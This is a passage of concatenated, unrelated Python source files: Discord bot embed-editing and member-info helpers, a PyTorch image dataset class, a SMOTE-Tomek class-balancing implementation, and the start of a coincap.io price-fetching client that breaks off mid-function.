        old_embed_dict, update_embed_dict, add_new_keys=add_attributes, skip_value=""
    )

    if inner_fields:
        # convert the index-keyed field dicts back into lists
        # NOTE(review): sorting stringified indices is lexicographic, so
        # with more than 10 fields "10" sorts before "2" — confirm intended
        if "fields" in old_embed_dict:
            old_embed_dict["fields"] = [
                old_embed_dict["fields"][i]
                for i in sorted(old_embed_dict["fields"].keys())
            ]
        if "fields" in update_embed_dict:
            update_embed_dict["fields"] = [
                update_embed_dict["fields"][i]
                for i in sorted(update_embed_dict["fields"].keys())
            ]

    if message is None:
        return discord.Embed.from_dict(old_embed_dict)
    return await message.edit(embed=discord.Embed.from_dict(old_embed_dict))
def create_from_dict(data):
    """
    Construct a discord.Embed from an embed dictionary, normalizing its
    timestamp entry first.
    """
    normalized = handle_embed_dict_timestamp(data)
    return discord.Embed.from_dict(normalized)
async def send_from_dict(channel: common.Channel, data):
    """
    Build an embed from an embed dictionary and send it to the given
    channel, returning the sent message.
    """
    new_embed = create_from_dict(data)
    return await channel.send(embed=new_embed)
async def replace_from_dict(message: discord.Message, data):
    """
    Replace the embed of a message with one built from an embed
    dictionary.

    Args:
        message (discord.Message): The message whose embed is replaced.
        data (dict): The embed dictionary (its timestamp is normalized).
    """
    # create_from_dict() already runs handle_embed_dict_timestamp(), so
    # the extra direct call that used to be here was redundant (the
    # helper is idempotent, making its removal behavior-preserving)
    return await message.edit(embed=create_from_dict(data))
async def edit_from_dict(
    message: discord.Message,
    embed: discord.Embed,
    update_embed_dict: dict,
    add_attributes: bool = True,
    inner_fields: bool = False,
):
    """
    Edits the changed attributes of the embed of a message from a
    dictionary with a much more tight function

    Args:
        message (discord.Message): The message whose embed is edited.
        embed (discord.Embed): The embed supplying the base data.
        update_embed_dict (dict): The embed dictionary with the changes;
            empty-string values are treated as "no change".
        add_attributes (bool): Whether attributes missing from the old
            embed may be added.
        inner_fields (bool): Merge fields index-by-index instead of
            replacing the whole field list.
    """
    old_embed_dict = embed.to_dict()

    if inner_fields:
        # recursive_update merges dicts, not lists: re-key both field
        # lists by stringified index so fields merge positionally
        if "fields" in old_embed_dict:
            old_embed_dict["fields"] = {
                str(i): old_embed_dict["fields"][i]
                for i in range(len(old_embed_dict["fields"]))
            }
        if "fields" in update_embed_dict:
            update_embed_dict["fields"] = {
                str(i): update_embed_dict["fields"][i]
                for i in range(len(update_embed_dict["fields"]))
            }

    # empty strings act as the "no change" sentinel here
    recursive_update(
        old_embed_dict, update_embed_dict, add_new_keys=add_attributes, skip_value=""
    )

    if inner_fields:
        # convert the index-keyed field dicts back into lists
        # NOTE(review): sorting stringified indices is lexicographic, so
        # with more than 10 fields "10" sorts before "2" — confirm intended
        if "fields" in old_embed_dict:
            old_embed_dict["fields"] = [
                old_embed_dict["fields"][i]
                for i in sorted(old_embed_dict["fields"].keys())
            ]
        if "fields" in update_embed_dict:
            update_embed_dict["fields"] = [
                update_embed_dict["fields"][i]
                for i in sorted(update_embed_dict["fields"].keys())
            ]

    old_embed_dict = handle_embed_dict_timestamp(old_embed_dict)
    return await message.edit(embed=discord.Embed.from_dict(old_embed_dict))
def edit_dict_from_dict(
    old_embed_dict: dict,
    update_embed_dict: dict,
    add_attributes: bool = True,
    inner_fields: bool = False,
):
    """
    Merge the changed attributes of one embed dictionary into another
    (mutating and returning the target), treating empty strings as the
    "no change" sentinel.

    Args:
        old_embed_dict (dict): The target embed dictionary.
        update_embed_dict (dict): The dictionary with the changes.
        add_attributes (bool): Whether missing attributes may be added.
        inner_fields (bool): Merge fields index-by-index instead of
            replacing the whole field list.
    """
    if inner_fields:
        # recursive_update merges dicts, not lists: temporarily re-key
        # both field lists by stringified index
        for target in (old_embed_dict, update_embed_dict):
            if "fields" in target:
                target["fields"] = {
                    str(i): field for i, field in enumerate(target["fields"])
                }

    recursive_update(
        old_embed_dict, update_embed_dict, add_new_keys=add_attributes, skip_value=""
    )

    if inner_fields:
        # restore the field dicts back into lists
        for target in (old_embed_dict, update_embed_dict):
            if "fields" in target:
                target["fields"] = [
                    target["fields"][i] for i in sorted(target["fields"].keys())
                ]

    return handle_embed_dict_timestamp(old_embed_dict)
async def replace_field_from_dict(
    message: discord.Message, embed: discord.Embed, field_dict: dict, index: int
):
    """
    Replace one embed field of a message's embed with the data from a
    field dictionary (negative indices count from the end).
    """
    if index < 0:
        index += len(embed.fields)

    embed.set_field_at(
        index,
        name=field_dict.get("name", ""),
        value=field_dict.get("value", ""),
        inline=field_dict.get("inline", True),
    )
    return await message.edit(embed=embed)
async def edit_field_from_dict(
    message: discord.Message, embed: discord.Embed, field_dict: dict, index: int
):
    """
    Update the matching keys of a single embed field of a message's
    embed from a field dictionary; empty-string values are ignored and
    negative indices count from the end.
    """
    if index < 0:
        index += len(embed.fields)

    old_field_dict = embed.to_dict()["fields"][index]
    for key, new_value in field_dict.items():
        # only overwrite keys the field already has, with real values
        if key in old_field_dict and new_value != "":
            old_field_dict[key] = new_value

    embed.set_field_at(
        index,
        name=old_field_dict.get("name", ""),
        value=old_field_dict.get("value", ""),
        inline=old_field_dict.get("inline", True),
    )
    return await message.edit(embed=embed)
async def edit_fields_from_dicts(
    message: discord.Message, embed: discord.Embed, field_dicts: list[dict]
):
    """
    Update multiple embed fields of a message's embed from a list of
    field dictionaries, pairing old and new fields up by position;
    empty-string values and empty dictionaries are ignored.
    """
    old_field_dicts = embed.to_dict().get("fields", [])

    # zip stops at the shorter of the two lists, matching positionally
    for i, (old_field_dict, field_dict) in enumerate(
        zip(old_field_dicts, field_dicts)
    ):
        if not field_dict:
            continue
        for key, new_value in field_dict.items():
            if key in old_field_dict and new_value != "":
                old_field_dict[key] = new_value
        embed.set_field_at(
            i,
            name=old_field_dict.get("name", ""),
            value=old_field_dict.get("value", ""),
            inline=old_field_dict.get("inline", True),
        )

    return await message.edit(embed=embed)
async def add_field_from_dict(
    message: discord.Message, embed: discord.Embed, field_dict: dict
):
    """
    Append one embed field built from a field dictionary to a message's
    embed.
    """
    name = field_dict.get("name", "")
    value = field_dict.get("value", "")
    inline = field_dict.get("inline", True)
    embed.add_field(name=name, value=value, inline=inline)
    return await message.edit(embed=embed)
async def add_fields_from_dicts(
    message: discord.Message, embed: discord.Embed, field_dicts: list[dict]
):
    """
    Append several embed fields built from field dictionaries to a
    message's embed, in the given order.
    """
    for entry in field_dicts:
        embed.add_field(
            name=entry.get("name", ""),
            value=entry.get("value", ""),
            inline=entry.get("inline", True),
        )
    return await message.edit(embed=embed)
async def insert_field_from_dict(
    message: discord.Message, embed: discord.Embed, field_dict: dict, index: int
):
    """
    Insert an embed field built from a field dictionary into a message's
    embed at the given index (negative indices count from the end).
    """
    if index < 0:
        index += len(embed.fields)

    embed.insert_field_at(
        index,
        name=field_dict.get("name", ""),
        value=field_dict.get("value", ""),
        inline=field_dict.get("inline", True),
    )
    return await message.edit(embed=embed)
async def insert_fields_from_dicts(
    message: discord.Message, embed: discord.Embed, field_dicts: list[dict], index: int
):
    """
    Inserts embed fields to the embed of a message from dictionaries
    at a specified index, preserving the order of ``field_dicts``.

    Args:
        message (discord.Message): The message whose embed is edited.
        embed (discord.Embed): The embed to insert into.
        field_dicts (list[dict]): The field dictionaries to insert.
        index (int): Insertion position (negative counts from the end).
    """
    fields_count = len(embed.fields)
    index = fields_count + index if index < 0 else index
    # BUGFIX: insert in reverse so that repeatedly inserting at the same
    # index leaves the fields in input order — the previous forward loop
    # ended up with them reversed (contrast clone_fields(), which
    # reverse-sorts for exactly this reason)
    for field_dict in reversed(field_dicts):
        embed.insert_field_at(
            index,
            name=field_dict.get("name", ""),
            value=field_dict.get("value", ""),
            inline=field_dict.get("inline", True),
        )
    return await message.edit(embed=embed)
async def remove_fields(
    message: discord.Message, embed: discord.Embed, field_indices: list
):
    """
    Remove multiple embed fields of a message's embed by index
    (negative indices count from the end).
    """
    fields_count = len(embed.fields)
    # normalize negatives, then delete from the highest index downwards
    # so earlier removals don't shift the remaining targets
    normalized_indices = sorted(
        (fields_count + idx if idx < 0 else idx for idx in field_indices),
        reverse=True,
    )
    for idx in normalized_indices:
        embed.remove_field(idx)

    return await message.edit(embed=embed)
async def swap_fields(
    message: discord.Message, embed: discord.Embed, index_a: int, index_b: int
):
    """
    Swap two embed fields of a message's embed (negative indices count
    from the end).
    """
    fields_count = len(embed.fields)
    if index_a < 0:
        index_a += fields_count
    if index_b < 0:
        index_b += fields_count

    embed_dict = embed.to_dict()
    fields = embed_dict["fields"]
    fields[index_b], fields[index_a] = fields[index_a], fields[index_b]
    return await message.edit(embed=discord.Embed.from_dict(embed_dict))
async def clone_field(message: discord.Message, embed: discord.Embed, index: int):
    """
    Duplicate a single embed field of a message's embed, placing the
    clone right next to the original (negative indices count from the
    end).
    """
    if index < 0:
        index += len(embed.fields)

    embed_dict = embed.to_dict()
    duplicate = dict(embed_dict["fields"][index])
    embed_dict["fields"].insert(index, duplicate)
    return await message.edit(embed=discord.Embed.from_dict(embed_dict))
async def clone_fields(
    message: discord.Message,
    embed: discord.Embed,
    field_indices: list,
    insertion_index: Optional[int] = None,
):
    """
    Duplicates multiple embed fields of the embed of a message.

    Args:
        message (discord.Message): The message whose embed is edited.
        embed (discord.Embed): The embed to operate on.
        field_indices (list): Indices of the fields to clone (negative
            indices count from the end).
        insertion_index (Optional[int]): If given, all clones are
            inserted together at this index (in ascending field order);
            otherwise each clone is inserted next to its original.
    """
    fields_count = len(embed.fields)
    parsed_field_indices = [
        fields_count + idx if idx < 0 else idx for idx in field_indices
    ]
    # descending order: inserting repeatedly at one position (or next to
    # each original) then preserves the ascending field order
    parsed_field_indices.sort(reverse=True)
    embed_dict = embed.to_dict()
    if isinstance(insertion_index, int):
        insertion_index = (
            fields_count + insertion_index if insertion_index < 0 else insertion_index
        )
        # BUGFIX: this branch previously re-sorted the raw (possibly
        # negative) field_indices instead of using the normalized
        # parsed_field_indices computed above, cloning fields in the
        # wrong order when negative and positive indices were mixed
        cloned_fields = tuple(
            embed_dict["fields"][index].copy() for index in parsed_field_indices
        )
        for cloned_field in cloned_fields:
            embed_dict["fields"].insert(insertion_index, cloned_field)
    else:
        for index in parsed_field_indices:
            cloned_field = embed_dict["fields"][index].copy()
            embed_dict["fields"].insert(index, cloned_field)
    return await message.edit(embed=discord.Embed.from_dict(embed_dict))
async def clear_fields(
    message: discord.Message,
    embed: discord.Embed,
):
    """
    Strip every field from the given embed, then push the edited
    embed back to the message.
    """
    embed.clear_fields()  # discord.Embed removes the whole field list in place
    return await message.edit(embed=embed)
def import_embed_data(
    source: Union[str, io.StringIO],
    from_string=False,
    from_json=False,
    from_json_string=False,
    as_string=False,
    as_dict=True,
):
    """
    Import embed data from a file or a string containing JSON
    or a Python dictionary and return it as a Python dictionary or string.

    Args:
        source: A file path, a `io.StringIO` buffer, or (for the
            `from_string`/`from_json_string` modes) the raw data itself.
        from_string: Parse `source` as a Python literal string.
        from_json: Parse `source` as a JSON file (path or buffer).
        from_json_string: Parse `source` as a JSON string.
        as_string: Return the data serialized as a string.
        as_dict: Require the parsed data to be a `dict`.

    Raises:
        TypeError: If the data cannot be parsed, or is not a `dict`
            while `as_dict` is set.
    """
    if from_json or from_json_string:
        if from_json_string:
            json_data = json.loads(source)
            if not isinstance(json_data, dict) and as_dict:
                raise TypeError(
                    "The given string must contain a JSON object that"
                    " can be converted into a Python `dict` object"
                )
        else:
            # BUGFIX: `json.load` needs a readable file object; a plain
            # string is a file path and must be opened first.
            if isinstance(source, str):
                with open(source, "r", encoding="utf-8") as json_file:
                    json_data = json.load(json_file)
            else:
                json_data = json.load(source)
            if not isinstance(json_data, dict) and as_dict:
                raise TypeError(
                    f"the file at '{source}' must contain a JSON object that"
                    " can be converted into a Python `dict` object"
                )
        if as_string:
            json_data = json.dumps(json_data)
        return json_data
    elif from_string:
        try:
            data = literal_eval(source)
        except Exception as e:
            # BUGFIX: `.with_traceback(e)` passed an exception where a
            # traceback object is required; chain the cause instead.
            raise TypeError(
                "The contents of the given object must be parsable into literal Python "
                "strings, bytes, numbers, tuples, lists, dicts, sets, booleans, and "
                "None."
            ) from e
        if not isinstance(data, dict) and as_dict:
            raise TypeError(
                f"the file at '{source}' must be of type dict" f", not '{type(data)}'"
            )
        if as_string:
            return repr(data)
        return data
    else:
        data = None
        if isinstance(source, io.StringIO):
            if as_string:
                data = source.getvalue()
            else:
                try:
                    data = literal_eval(source.getvalue())
                except Exception as e:
                    # BUGFIX: message fragments were previously misordered
                    # and `.with_traceback(e)` was invalid.
                    raise TypeError(
                        f"the content of the file at '{source}' must be parsable "
                        "into literal Python strings, bytes, numbers, tuples, "
                        "lists, dicts, sets, booleans, and None."
                    ) from e
                if not isinstance(data, dict) and as_dict:
                    raise TypeError(
                        f"the file at '{source}' must be of type dict"
                        f", not '{type(data)}'"
                    )
        else:
            with open(source, "r", encoding="utf-8") as d:
                if as_string:
                    data = d.read()
                else:
                    try:
                        data = literal_eval(d.read())
                    except Exception as e:
                        raise TypeError(
                            f"the content of the file at '{source}' must be parsable "
                            "into literal Python strings, bytes, numbers, tuples, "
                            "lists, dicts, sets, booleans, and None."
                        ) from e
                    if not isinstance(data, dict) and as_dict:
                        raise TypeError(
                            f"the file at '{source}' must be of type dict"
                            f", not '{type(data)}'"
                        )
        return data
def export_embed_data(
    data: Union[dict, tuple, list],
    fp: Union[str, io.StringIO] = None,
    indent=None,
    as_json=True,
    always_return=False,
):
    """
    Serialize embed data either as JSON or as a black-formatted Python
    literal, writing it to a file path or `StringIO` buffer, or — when
    no target is given — returning it as a string.
    """
    return_data = None
    if as_json:
        if isinstance(fp, str):
            with open(fp, "w", encoding="utf-8") as file_obj:
                json.dump(data, file_obj, indent=indent)
            if always_return:
                return_data = json.dumps(data, indent=indent)
        elif isinstance(fp, io.StringIO):
            json.dump(data, fp, indent=indent)
            if always_return:
                return_data = fp.getvalue()
        else:
            # No target: always hand the serialized string back.
            return_data = json.dumps(data, indent=indent)
        return return_data
    if isinstance(fp, str):
        with open(fp, "w", encoding="utf-8") as file_obj:
            formatted = black.format_str(
                repr(data),
                mode=black.FileMode(),
            )
            file_obj.write(formatted)
            if always_return:
                return_data = formatted
    elif isinstance(fp, io.StringIO):
        formatted = black.format_str(
            repr(data),
            mode=black.FileMode(),
        )
        fp.write(formatted)
        fp.seek(0)  # leave the buffer rewound for the caller
        if always_return:
            return_data = formatted
    else:
        return_data = repr(data)
    return return_data
def get_member_info_str(member: Union[discord.Member, discord.User]):
    """
    Get member info in a string, utility function for the embed functions.

    Builds a markdown-formatted summary of the member's name, account
    dates, roles and status flags for use in an embed.
    """
    datetime_format_str = "`%a, %d %b %Y`\n> `%H:%M:%S (UTC) `"
    member_name_info = f"\u200b\n*Name*: \n> {member.mention} \n> "
    # BUGFIX: this previously tested `member.display_name`, which is always
    # truthy (it falls back to the username), so members without a nickname
    # were still rendered in the nickname format; test `member.nick` instead
    # (consistent with get_msg_info_embed).
    if isinstance(member, discord.Member) and member.nick:
        # Escape markdown metacharacters in the nickname.
        member_nick = (
            member.nick.replace("\\", r"\\")
            .replace("*", r"\*")
            .replace("`", r"\`")
            .replace("_", r"\_")
        )
        member_name_info += (
            f"**{member_nick}**\n> (*{member.name}#{member.discriminator}*)\n\n"
        )
    else:
        member_name_info += f"**{member.name}**#{member.discriminator}\n\n"
    member_created_at_fdtime = member.created_at.astimezone(
        tz=datetime.timezone.utc
    ).strftime(datetime_format_str)
    member_created_at_info = (
        f"*Created On*:\n`{member.created_at.isoformat()}`\n"
        + f"> {member_created_at_fdtime}\n\n"
    )
    if isinstance(member, discord.Member) and member.joined_at:
        member_joined_at_fdtime = member.joined_at.astimezone(
            tz=datetime.timezone.utc
        ).strftime(datetime_format_str)
        member_joined_at_info = (
            f"*Joined On*:\n`{member.joined_at.isoformat()}`\n"
            + f"> {member_joined_at_fdtime}\n\n"
        )
    else:
        member_joined_at_info = "*Joined On*: \n> `...`\n\n"
    # Divider roles are cosmetic separators and are excluded from the
    # "functional" role count; role 0 is @everyone and is skipped.
    divider_roles = {} if common.GENERIC else common.ServerConstants.DIVIDER_ROLES
    member_func_role_count = (
        sum(
            1
            for i in range(1, len(member.roles))
            if member.roles[i].id not in divider_roles
        )
        if isinstance(member, discord.Member)
        else ""
    )
    if isinstance(member, discord.Member) and member_func_role_count:
        member_top_role_info = f"*Highest Role*: \n> {member.roles[-1].mention}\n> `<@&{member.roles[-1].id}>`\n\n"
        if member_func_role_count != len(member.roles) - 1:
            # Show total role count in parentheses when dividers were excluded.
            member_role_count_info = f"*Role Count*: \n> `{member_func_role_count} ({len(member.roles) - 1})`\n\n"
        else:
            member_role_count_info = f"*Role Count*: \n> `{member_func_role_count}`\n\n"
    else:
        member_top_role_info = member_role_count_info = ""
    member_id_info = f"*Member ID*: \n> <@!`{member.id}`>\n\n"
    if isinstance(member, discord.Member):
        member_stats = (
            f"*Is Pending Screening*: \n> `{member.pending}`\n\n"
            f"*Is Bot Account*: \n> `{member.bot}`\n\n"
            f"*Is System User (Discord Official)*: \n> `{member.system}`\n\n"
        )
    else:
        member_stats = (
            f"*Is Bot Account*: \n> `{member.bot}`\n\n"
            f"*Is System User (Discord Official)*: \n> `{member.system}`\n\n"
        )
    return "".join(
        (
            member_name_info,
            member_created_at_info,
            member_joined_at_info,
            member_top_role_info,
            member_role_count_info,
            member_id_info,
            member_stats,
        )
    )
def get_msg_info_embed(msg: discord.Message, author: bool = True):
    """
    Generate an embed containing info about a message and its author.

    Args:
        msg: The message to describe.
        author: Whether to include a separate author-info field.
    """
    member: Union[discord.Member, discord.User] = msg.author
    datetime_format_str = "`%a, %d %b %Y`\n> `%H:%M:%S (UTC) `"
    msg_created_at_fdtime = msg.created_at.astimezone(
        tz=datetime.timezone.utc
    ).strftime(datetime_format_str)
    # BUGFIX: operator precedence previously made this expression evaluate
    # to just "\u200b\n" whenever `author` was True, dropping the whole
    # "Created On" section; parenthesize the conditional.
    msg_created_at_info = (
        ("\u200b\n" if author else "")
        + f"*Created On:*\n`{msg.created_at.isoformat()}`\n"
        + f"> {msg_created_at_fdtime}\n\n"
    )
    if msg.edited_at:
        msg_edited_at_fdtime = msg.edited_at.astimezone(
            tz=datetime.timezone.utc
        ).strftime(datetime_format_str)
        msg_edited_at_info = (
            f"*Last Edited On*:\n`{msg.edited_at.isoformat()}`\n"
            + f"> {msg_edited_at_fdtime}\n\n"
        )
    else:
        msg_edited_at_info = "*Last Edited On*: \n> `...`\n\n"
    msg_id_info = f"*Message ID*: \n> `{msg.id}`\n\n"
    msg_char_count_info = f"*Char. Count*: \n> `{len(msg.content) if isinstance(msg.content, str) else 0}`\n\n"
    msg_attachment_info = (
        f"*Number Of Attachments*: \n> `{len(msg.attachments)} attachment(s)`\n\n"
    )
    msg_embed_info = f"*Number Of Embeds*: \n> `{len(msg.embeds)} embed(s)`\n\n"
    msg_is_pinned = f"*Is Pinned*: \n> `{msg.pinned}`\n\n"
    msg_info = "".join(
        (
            msg_created_at_info,
            msg_edited_at_info,
            msg_char_count_info,
            msg_id_info,
            msg_embed_info,
            msg_attachment_info,
            msg_is_pinned,
        )
    )
    # Message text, truncated past 2000 characters.
    # BUGFIX: operator precedence previously dropped the message text
    # entirely for messages of 2000 characters or fewer.
    msg_text = (
        "__Text" + (" (Shortened)" if len(msg.content) > 2000 else "") + "__:",
        f"\n\n {msg.content[:2001]}"
        + ("\n\n[...]\n\u2800" if len(msg.content) > 2000 else "\n\u2800"),
    )
    if author:
        return create(
            title="__Message & Author Info__",
            description="".join(msg_text),
            thumbnail_url=str(member.avatar_url),
            fields=[
                ("__Message Info__", msg_info, True),
                ("__Message Author Info__", get_member_info_str(member), True),
                ("\u2800", f"**[View Original Message]({msg.jump_url})**", False),
            ],
        )
    member_name_info = f"\u200b\n*Name*: \n> {member.mention} \n> "
    if isinstance(member, discord.Member) and member.nick:
        # Escape markdown metacharacters in the nickname.
        member_nick = (
            member.nick.replace("\\", r"\\")
            .replace("*", r"\*")
            .replace("`", r"\`")
            .replace("_", r"\_")
        )
        member_name_info += (
            f"**{member_nick}**\n> (*{member.name}#{member.discriminator}*)\n\n"
        )
    else:
        member_name_info += f"**{member.name}**#{member.discriminator}\n\n"
    return create(
        title="__Message Info__",
        author_name=f"{member.name}#{member.discriminator}",
        author_icon_url=str(member.avatar_url),
        description="".join(msg_text),
        fields=[
            (
                "__" + ("Message " if author else "") + "Info__",
                member_name_info + msg_info,
                True,
            ),
            ("\u2800", f"**[View Original Message]({msg.jump_url})**", False),
        ],
    )
def get_member_info_embed(member: Union[discord.Member, discord.User]):
    """
    Generate an embed containing info about a server member.
    """
    # Users outside a guild context are titled "User" instead of "Member".
    is_member = isinstance(member, discord.Member)
    return create(
        title="__" + ("Member" if is_member else "User") + " Info__",
        description=get_member_info_str(member),
        thumbnail_url=str(member.avatar_url),
    )
|
from torch.utils import data
import torch
from PIL import Image
class HAM_dataset(data.Dataset):
    """PyTorch dataset over a dataframe of image paths and labels."""
    def __init__(self, df, transform=None):
        """Store the sample dataframe and an optional image transform."""
        self.df = df
        self.transform = transform
    def __len__(self):
        """Number of samples is the number of dataframe rows."""
        return len(self.df)
    def __getitem__(self, index):
        """Load one (image, label) pair by row index."""
        sample = Image.open(self.df['path'][index])
        label = torch.tensor(int(self.df['cell_type_idx'][index]))
        if self.transform:
            sample = self.transform(sample)
        return sample, label
|
'''
Created with love by Sigmoid
@Author - Stojoc Vladimir - vladimir.stojoc@gmail.com
'''
import numpy as np
import pandas as pd
import random
import sys
from random import randrange
from .erorrs import NotBinaryData, NoSuchColumn
def warn(*args, **kwargs):
    # Intentional no-op: replacement target for `warnings.warn` below.
    pass
import warnings
# Monkey-patch: globally silence `warnings.warn` for everything this
# module (and its dependencies) emits after this point.
warnings.warn = warn
class SMOTETOMEK:
    '''
        Hybrid balancer for binary targets: first removes Tomek links
        (boundary majority samples), then generates SMOTE-style synthetic
        minority samples until the two classes are balanced.
    '''
    def __init__(self, k: "int > 0" = 5, seed: float = 42, binary_columns: list = None) -> None:
        '''
            Setting up the algorithm
        :param k: int, k>0, default = 5
            Number of neighbours which will be considered when looking for similar data points
        :param seed: int, default = 42
            seed for random
        :param binary_columns: list, default = None
            The list of columns that should have binary values after balancing.
        '''
        self.__k = k
        if binary_columns is None:
            self.__binarize = False
            self.__binary_columns = None
        else:
            self.__binarize = True
            self.__binary_columns = binary_columns
        self.__seed = seed
        # Seed both RNGs so balancing is reproducible.
        np.random.seed(self.__seed)
        random.seed(self.__seed)
    def __to_binary(self) -> None:
        '''
            If :param binary_columns: was set, round the intermediate values
            of those columns back to the column's original min/max values.
        '''
        for column_name in self.__binary_columns:
            serie = self.synthetic_df[column_name].values
            # Midpoint between the two original binary values.
            threshold = (self.df[column_name].max() + self.df[column_name].min()) / 2
            for i in range(len(serie)):
                if serie[i] >= threshold:
                    serie[i] = self.df[column_name].max()
                else:
                    serie[i] = self.df[column_name].min()
            self.synthetic_df[column_name] = serie
    def __infinity_check(self, matrix: 'np.array') -> 'np.array':
        '''
            Replace infinity and -infinity values with the maximal and
            minimal python float values.
        :param matrix: 'np.array'
            The numpy array that was generated by the algorithm.
        :return: 'np.array'
            The numpy array with the infinity values replaced.
        '''
        matrix[matrix == -np.inf] = sys.float_info.min
        matrix[matrix == np.inf] = sys.float_info.max
        return matrix
    def __undersample(self):
        '''
            Undersample the dataset using the Tomek links algorithm: a
            Tomek link is a pair of opposite-class samples that are each
            other's nearest neighbour; the majority member of every such
            pair is removed.
        '''
        minority_nearest = []
        majority_nearest = []
        # Nearest majority sample for every minority sample.
        for example in self.minority_samples:
            distances = [np.linalg.norm(x - example, ord=2) for x in self.majority_samples]
            minority_nearest.append(np.argsort(distances)[0])
        # Nearest minority sample for every majority sample.
        for example in self.majority_samples:
            distances = [np.linalg.norm(x - example, ord=2) for x in self.minority_samples]
            majority_nearest.append(np.argsort(distances)[0])
        # Keep only mutual nearest-neighbour pairs (true Tomek links).
        to_delete = []
        for i in range(len(minority_nearest)):
            if i == majority_nearest[minority_nearest[i]]:
                to_delete.append(minority_nearest[i])
        self.majority_samples = np.delete(self.majority_samples, to_delete, axis=0)
        # Rebuild the working data frame without the Tomek links.
        mj = pd.DataFrame(self.majority_samples, columns=self.X_columns)
        mj.loc[:, self.target] = self.majority_class
        mn = pd.DataFrame(self.minority_samples, columns=self.X_columns)
        mn.loc[:, self.target] = self.minority_class
        self.df = pd.concat([mj, mn], axis=0)
    def balance(self, df: pd.DataFrame, target: str) -> pd.DataFrame:
        '''
            Balance the binary :param target: column of :param df: and
            return a new, balanced data frame.
        :param df: pandas DataFrame
            Data Frame on which the algorithm is applied
        :param target: string
            The target name of the value that we have to predict
        '''
        # BUGFIX: the column-existence check must run before the column is
        # accessed; previously a missing column raised KeyError instead of
        # the documented NoSuchColumn error.
        if target not in df.columns:
            raise NoSuchColumn(f"{target} isn't a column of passed data frame")
        unique = df[target].unique()
        if len(unique) != 2:
            raise NotBinaryData(f"{target} column isn't a binary column")
        self.target = target
        self.df = df.copy()
        self.X_columns = [column for column in self.df.columns if column != target]
        # Identify the minority class by its share of the rows.
        first_class = len(df[df[target] == unique[0]]) / len(df[target])
        if first_class > 0.5:
            self.minority_class, self.majority_class = unique[1], unique[0]
        else:
            self.minority_class, self.majority_class = unique[0], unique[1]
        majority = df[df[target] == self.majority_class]
        minority = df[df[target] == self.minority_class]
        self.minority_samples = self.df[self.df[target] == self.minority_class][self.X_columns].values
        self.majority_samples = self.df[self.df[target] == self.majority_class][self.X_columns].values
        # Remove Tomek links first.
        self.__undersample()
        # Number of synthetic minority samples needed, based on the
        # original (pre-undersampling) class sizes.
        difference = len(majority) - len(minority)
        self.synthetic_data = []
        for _ in range(difference):
            # Pick a random minority sample ...
            index = randrange(len(self.minority_samples))
            example = self.minority_samples[index]
            # ... one of its k nearest minority neighbours ...
            neighbours_indexes = self.__get_k_neighbours(example)
            index = randrange(len(neighbours_indexes))
            selected_neighbour = self.minority_samples[neighbours_indexes[index]]
            # ... and a random point on the segment between them.
            alpha = random.random()
            self.synthetic_data.append(example + alpha * (selected_neighbour - example))
        self.synthetic_data = self.__infinity_check(np.array(self.synthetic_data))
        self.synthetic_df = pd.DataFrame(np.array(self.synthetic_data), columns=self.X_columns)
        self.synthetic_df.loc[:, target] = self.minority_class
        self.synthetic_df = pd.concat([self.synthetic_df, self.df], axis=0)
        # Rounding binary columns if needed.
        if self.__binarize:
            self.__to_binary()
        return self.synthetic_df
    def __get_k_neighbours(self, example):
        '''
            Return the indexes of the k nearest minority-class neighbours of
            :param example: (the sample itself, at distance 0, is excluded).
        :param example: Numpy array
            the sample row from minority class to get neighbours from
        '''
        distances = [np.linalg.norm(x - example, ord=2) for x in self.minority_samples]
        return np.argsort(distances)[1:self.__k + 1]
import time
from datetime import datetime
from typing import List, Dict, Tuple
import pandas as pd
import requests
from mpt import Asset
"""
The complete documentation for the coincap.io REST API can be found at https://docs.coincap.io/.
"""
def request_and_jsonize_calm(url, params=None):
    """
    GET `url` and return the decoded JSON body, backing off and retrying
    (up to 3 times) when the API answers 429 Too Many Requests.

    Raises:
        Exception: After 3 rate-limited attempts in a row.
        requests.HTTPError: For any other non-200 status code.
    """
    repeats = 0
    while True:
        response = requests.get(url, params=params)
        if response.status_code == 200:
            return response.json()
        if response.status_code == 429:
            repeats += 1
            # BUGFIX: the retry cap was previously checked after `continue`,
            # so a persistent 429 made this loop forever.
            if repeats >= 3:
                raise Exception(f'Retried too many times: stuck on url {url}')
            sleep_secs = 5 * repeats  # linear backoff: 5s, 10s
            print(f'Sleeping {sleep_secs} seconds on url: {url}')
            time.sleep(sleep_secs)
            continue
        response.raise_for_status()
def get_available_assets(limit: int = 100) -> List:
    """ Get the first most capitalized assets from the coincap.io API. """
    js = request_and_jsonize_calm(
        f"https://api.coincap.io/v2/assets", params={'limit': str(limit)}
    )
    # Keep only the fields the rest of the pipeline needs.
    return [
        {'id': entry['id'], 'symbol': entry['symbol'], 'name': entry['name']}
        for entry in js['data']
    ]
def filter_by_symbol(assets: List[Dict], symbols: List) -> List:
    """ Filter the wanted assets, returning a list of assets ordered in the same way as the symbols list.
    If one asset is not available, throw an exception.
    """
    filtered_assets = []
    # BUGFIX: the old `found` flag was set once and never reset, so any
    # missing symbol after the first match was silently ignored; the
    # for/else below raises per symbol instead.
    for symbol in symbols:
        for asset in assets:
            if asset['symbol'].lower() == symbol.lower():
                filtered_assets.append(asset)
                break
        else:
            raise Exception(f'Asset with symbol {symbol} not found in the provided list.')
    return filtered_assets
def get_series(currency_id: str, interval: str) -> pd.DataFrame:
    """ Get the time series for the given currency_id. Timestamps and dates are given in UTC time. """
    url = f"https://api.coincap.io/v2/assets/{currency_id}/history"
    js = request_and_jsonize_calm(url, params={'interval': interval})
    times, prices, dates = [], [], []
    for measurement in js['data']:
        timestamp_seconds = float(measurement['time']) // 1000  # API timestamps are in milliseconds
        times.append(timestamp_seconds)
        prices.append(float(measurement['priceUsd']))
        # BUGFIX: `datetime.fromtimestamp` converts to the *local* timezone,
        # contradicting the documented UTC contract; use the UTC variant.
        dates.append(datetime.utcfromtimestamp(timestamp_seconds))
    df = pd.DataFrame(
        {
            'date': dates,
            'time': times,
            'price': prices
        }
    )
    return df
def get_assets(symbols: List[str], search_limit: int = 100) -> Tuple:
    """ Get the dataframes of the wanted assets, specified as symbols in the symbols list. """
    # 1) Fetch the most capitalized assets, up to the search limit.
    available = get_available_assets(search_limit)
    # 2) Keep only the requested symbols (raises if one is missing).
    try:
        wanted = filter_by_symbol(available, symbols)
    except Exception as e:
        raise e  # We may be wanting to do something about that
    # 3) Build an Asset (symbol + daily price series) for each match.
    collected = []
    for entry in wanted:
        time.sleep(5)  # stay well under the API rate limit
